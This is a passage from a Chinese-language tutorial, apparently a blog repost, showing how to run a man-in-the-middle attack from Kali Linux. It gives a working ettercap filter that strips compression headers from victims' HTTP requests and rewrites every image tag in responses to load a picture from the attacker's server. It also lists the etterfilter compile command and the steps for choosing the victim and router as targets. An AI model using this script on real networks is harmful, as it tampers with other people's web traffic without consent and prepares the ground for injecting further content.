恩恩!低调点好!
我们将图片放大kali的var/www/html
目录下
servce apache2 start
三:编写攻击脚本
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
#note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
msg("过滤执行.\n");
}
然后另存为alert.filter
文件
etterfilter alert.filter -o alert.ef
将目标添加为1 路由器自身添加为2
然后我们载入刚才生成的脚本
然后开始中间人攻击
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1920532
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。